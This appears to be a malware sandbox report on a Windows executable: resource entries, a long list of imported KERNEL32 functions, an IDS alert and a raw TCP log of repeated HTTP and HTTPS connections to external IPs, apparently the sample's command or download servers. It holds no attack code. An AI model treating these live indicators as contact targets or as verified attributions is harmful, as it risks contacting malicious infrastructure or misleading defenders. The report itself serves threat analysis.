RT_ICON	0xcc4a8	0x468	GLS_BINARY_LSB_FIRST	Spanish	Colombia
RT_STRING	0xce790	0x72	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0xce808	0x256	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0xcea60	0x794	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0xcf1f8	0x90	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0xcc9c8	0x78	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0xcc970	0x58	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0xccbc0	0x14	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0xcdea0	0x30	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0xce778	0x14	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0xcc910	0x5a	data	Spanish	Colombia
None	0xcca50	0xa	data	Divehi; Dhivehi; Maldivian	Maldives
None	0xcca60	0xa	data	Divehi; Dhivehi; Maldivian	Maldives
None	0xcca40	0xa	data	Divehi; Dhivehi; Maldivian	Maldives
None	0xcca70	0xa	data	Divehi; Dhivehi; Maldivian	Maldives
None	0xcca80	0xa	data	Divehi; Dhivehi; Maldivian	Maldives

Imports

DLL

Import

KERNEL32.dll

GetNamedPipeHandleStateW, CreateNamedPipeA, CallNamedPipeW, TerminateThread, GetExitCodeProcess, GetVersionExA, VerifyVersionInfoW, SetConsoleCP, GetConsoleAliasesLengthA, VerLanguageNameA, FindFirstFileExA, VerifyVersionInfoA, FreeEnvironmentStringsA, GetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameA, CopyFileA, TlsGetValue, SetConsoleCursorInfo, TzSpecificLocalTimeToSystemTime, AddAtomA, ReleaseMutex, GetNamedPipeHandleStateA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, GlobalAlloc, Sleep, TlsSetValue, MoveFileA, GetCommandLineW, InterlockedExchange, DeleteFileW, CreateActCtxA, SetFileAttributesA, GetPrivateProfileIntW, GetProcessHeap, CreateNamedPipeW, ReadConsoleOutputCharacterA, GetStartupInfoA, GetDiskFreeSpaceExW, GetCPInfoExW, GetWindowsDirectoryW, GetSystemWow64DirectoryA, SetLastError, GetProfileStringA, GetCalendarInfoW, FreeUserPhysicalPages, GetTickCount, GetStringTypeA, DebugBreak, FindFirstFileA, lstrcmpA, WriteFile, GetConsoleMode, lstrcatW, SetFirmwareEnvironmentVariableA, DefineDosDeviceW, EndUpdateResourceA, WriteConsoleW, InterlockedIncrement, SetSystemTimeAdjustment, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileStructA, GetPrivateProfileStructW, GetFileAttributesExW, HeapUnlock, CreateIoCompletionPort, PeekConsoleInputA, GetNumberFormatW, GetQueuedCompletionStatus, FindResourceExA, SetLocalTime, TryEnterCriticalSection, CreateSemaphoreA, GetThreadLocale, SetFileShortNameA, lstrcpyA, ReplaceFileA, LockFileEx, MoveFileExA, GetConsoleCP, GetVolumePathNameA, FlushConsoleInputBuffer, SearchPathW, FreeConsole, GetConsoleAliasExesLengthW, WriteConsoleInputW, LocalShrink, SetCommState, GetSystemTimeAdjustment, EnumSystemLocalesW, ProcessIdToSessionId, GetDevicePowerState, DeleteTimerQueueTimer, GetWriteWatch, OpenSemaphoreA, GetConsoleScreenBufferInfo, ClearCommBreak, TlsAlloc, OpenMutexW, GetComputerNameW, HeapValidate, GetLastError, OpenMutexA, WaitForMultipleObjectsEx, SignalObjectAndWait, GetSystemPowerStatus, VirtualLock, SetWaitableTimer, ChangeTimerQueueTimer, GetProcessTimes, FatalAppExitA, lstrcpynA, SetNamedPipeHandleState, FillConsoleOutputCharacterA, GetCompressedFileSizeW, FindNextVolumeMountPointA, GetFullPathNameA, WriteProfileStringA, UnlockFile, GlobalAddAtomW, EnterCriticalSection, SetCurrentDirectoryW, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, IsBadReadPtr, RtlUnwind, RaiseException, GetModuleHandleW, ExitProcess, DeleteFileA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapSize, HeapQueryInformation, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, HeapCreate, GetACP, GetOEMCP, IsValidCodePage, GetCurrentThreadId, TlsFree, GetStdHandle, LoadLibraryW, GetLocaleInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStringTypeW, GetLocaleInfoA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, OutputDebugStringA, OutputDebugStringW, SetFilePointer, SetStdHandle, CreateFileW, CloseHandle, FlushFileBuffers

Possible Origin

Language of compilation system	Country where language is spoken	Map
Divehi; Dhivehi; Maldivian	Maldives
Spanish	Colombia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/28/21-13:56:13.072786	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.4	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2021 13:54:48.240751982 CET	49786	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:48.415318966 CET	80	49786	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:48.415499926 CET	49786	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:48.415672064 CET	49786	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:48.415689945 CET	49786	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:48.590718985 CET	80	49786	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:48.974246025 CET	80	49786	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:48.978246927 CET	49786	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:48.979311943 CET	49786	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:49.008280039 CET	49787	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:49.153706074 CET	80	49786	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:49.188935995 CET	80	49787	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:49.189016104 CET	49787	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:49.189124107 CET	49787	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:49.189142942 CET	49787	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:49.369729996 CET	80	49787	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:49.753453970 CET	80	49787	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:49.753607988 CET	49787	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:49.753669977 CET	49787	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:49.934385061 CET	80	49787	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:50.092963934 CET	49788	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:50.272917986 CET	80	49788	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:50.273037910 CET	49788	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:50.273237944 CET	49788	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:50.273282051 CET	49788	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:50.452949047 CET	80	49788	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:50.826272011 CET	80	49788	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:50.826400995 CET	49788	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:50.826649904 CET	49788	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:50.854266882 CET	49790	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:51.006403923 CET	80	49788	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:51.034526110 CET	80	49790	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:51.034646034 CET	49790	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:51.034786940 CET	49790	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:51.034816980 CET	49790	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:51.214282990 CET	80	49790	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:51.214313030 CET	80	49790	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:51.603113890 CET	80	49790	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:51.604226112 CET	49790	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:51.604536057 CET	49790	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:51.633146048 CET	49791	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:51.784141064 CET	80	49790	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:51.805850029 CET	80	49791	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:51.806391954 CET	49791	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:51.806477070 CET	49791	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:51.806488037 CET	49791	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:51.979099035 CET	80	49791	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:52.354857922 CET	80	49791	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:52.354892969 CET	80	49791	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:52.354963064 CET	49791	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:52.355257988 CET	49791	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:52.385899067 CET	49792	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:52.527923107 CET	80	49791	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:52.559302092 CET	80	49792	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:52.559458971 CET	49792	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:52.559643030 CET	49792	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:52.559665918 CET	49792	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:52.732996941 CET	80	49792	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:53.118556976 CET	80	49792	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:53.118628979 CET	80	49792	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:53.118824005 CET	49792	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:53.119051933 CET	49792	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:53.292340994 CET	80	49792	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:53.444197893 CET	49793	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:53.624084949 CET	80	49793	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:53.624197960 CET	49793	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:53.624316931 CET	49793	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:53.624475956 CET	49793	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:53.804936886 CET	80	49793	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:53.804991007 CET	80	49793	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:54.195750952 CET	80	49793	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:54.196724892 CET	49793	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:54.196980000 CET	49793	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:54.208082914 CET	49794	80	192.168.2.4	185.186.142.166
Dec 28, 2021 13:54:54.262986898 CET	80	49794	185.186.142.166	192.168.2.4
Dec 28, 2021 13:54:54.376764059 CET	80	49793	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:54.776233912 CET	49794	80	192.168.2.4	185.186.142.166
Dec 28, 2021 13:54:54.830984116 CET	80	49794	185.186.142.166	192.168.2.4
Dec 28, 2021 13:54:55.338762045 CET	49794	80	192.168.2.4	185.186.142.166
Dec 28, 2021 13:54:55.393585920 CET	80	49794	185.186.142.166	192.168.2.4
Dec 28, 2021 13:54:55.422472954 CET	49795	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:55.598130941 CET	80	49795	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:55.598421097 CET	49795	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:55.598448038 CET	49795	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:55.598453045 CET	49795	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:55.773916960 CET	80	49795	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:56.155267954 CET	80	49795	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:56.155297041 CET	80	49795	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:56.155812979 CET	49795	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:56.155847073 CET	49795	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:56.182193041 CET	49796	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:56.331476927 CET	80	49795	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:56.358776093 CET	80	49796	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:56.358923912 CET	49796	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:56.359143019 CET	49796	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:56.359200001 CET	49796	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:56.535573006 CET	80	49796	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:56.535619020 CET	80	49796	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:56.915194988 CET	80	49796	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:56.915313959 CET	49796	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:56.916055918 CET	49796	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:56.956935883 CET	49797	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:57.092355013 CET	80	49796	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:57.136825085 CET	80	49797	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:57.138005972 CET	49797	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:57.251928091 CET	49797	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:57.475714922 CET	80	49797	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:57.802864075 CET	80	49797	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:57.803092003 CET	49797	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:57.803340912 CET	49797	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:57.831357956 CET	49798	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:57.982929945 CET	80	49797	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:58.004106998 CET	80	49798	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:58.005069971 CET	49798	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:58.363480091 CET	49798	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:58.363509893 CET	49798	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:58.536025047 CET	80	49798	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:58.914283037 CET	80	49798	47.251.11.252	192.168.2.4
Dec 28, 2021 13:54:58.915019035 CET	49798	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:58.915049076 CET	49798	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:54:59.087554932 CET	80	49798	47.251.11.252	192.168.2.4
Dec 28, 2021 13:55:00.049998045 CET	49799	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:55:00.231750011 CET	80	49799	47.251.11.252	192.168.2.4
Dec 28, 2021 13:55:00.231832981 CET	49799	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:55:00.231923103 CET	49799	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:55:00.231942892 CET	49799	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:55:00.413466930 CET	80	49799	47.251.11.252	192.168.2.4
Dec 28, 2021 13:55:00.794028044 CET	80	49799	47.251.11.252	192.168.2.4
Dec 28, 2021 13:55:00.794346094 CET	49799	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:55:00.794528008 CET	49799	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:55:00.804122925 CET	49800	443	192.168.2.4	185.233.81.115
Dec 28, 2021 13:55:00.804177999 CET	443	49800	185.233.81.115	192.168.2.4
Dec 28, 2021 13:55:00.804313898 CET	49800	443	192.168.2.4	185.233.81.115
Dec 28, 2021 13:55:00.805540085 CET	49800	443	192.168.2.4	185.233.81.115
Dec 28, 2021 13:55:00.805571079 CET	443	49800	185.233.81.115	192.168.2.4
Dec 28, 2021 13:55:00.976114035 CET	80	49799	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:00.234960079 CET	49800	443	192.168.2.4	185.233.81.115
Dec 28, 2021 13:56:00.570060015 CET	49844	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:00.745579004 CET	80	49844	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:00.745739937 CET	49844	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:00.745909929 CET	49844	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:00.745946884 CET	49844	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:00.923042059 CET	80	49844	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:01.319165945 CET	80	49844	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:01.319447994 CET	49844	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:01.319608927 CET	49844	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:01.495086908 CET	80	49844	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:01.679044008 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:01.858856916 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:01.860532045 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:01.860596895 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.083646059 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409576893 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409607887 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409631014 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409651995 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409673929 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409696102 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409713984 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.409717083 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409744024 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409766912 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409809113 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.409857035 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.409878969 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.589534998 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591104031 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591140985 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591165066 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591181993 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.591190100 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591212988 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591217995 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.591238022 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591262102 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591269016 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.591284990 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591308117 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591331959 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591331005 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.591355085 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591368914 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.591377020 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591401100 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591409922 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.591423988 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591447115 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.591448069 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591473103 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591495991 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591506958 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.591517925 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591537952 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.591541052 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.591617107 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.771267891 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.771303892 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.771322966 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.771440983 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.772562981 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772589922 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772612095 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772634029 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772655964 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772677898 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772677898 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.772702932 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.772702932 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772728920 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772752047 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772774935 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772783995 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.772799015 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772821903 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.772824049 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772866011 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.772872925 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772898912 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772917986 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772941113 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772949934 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.772964954 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772989035 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.772989988 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773011923 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773020029 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773035049 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773057938 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773058891 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773082018 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773093939 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773103952 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773127079 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773149014 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773150921 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773171902 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773194075 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773195028 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773220062 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773242950 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773266077 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773283958 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773288965 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773288965 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773312092 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773334026 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773356915 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773359060 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773379087 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773400068 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773402929 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773422956 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.773430109 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.773468018 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.951843023 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.951925039 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.951945066 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.951962948 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.951981068 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.951998949 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.952039957 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.952083111 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.954468012 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954503059 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954546928 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954597950 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.954619884 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954648972 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954670906 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.954675913 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954704046 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954727888 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954730034 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.954756021 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954782009 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954785109 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.954808950 CET	80	49845	47.251.11.252	192.168.2.4
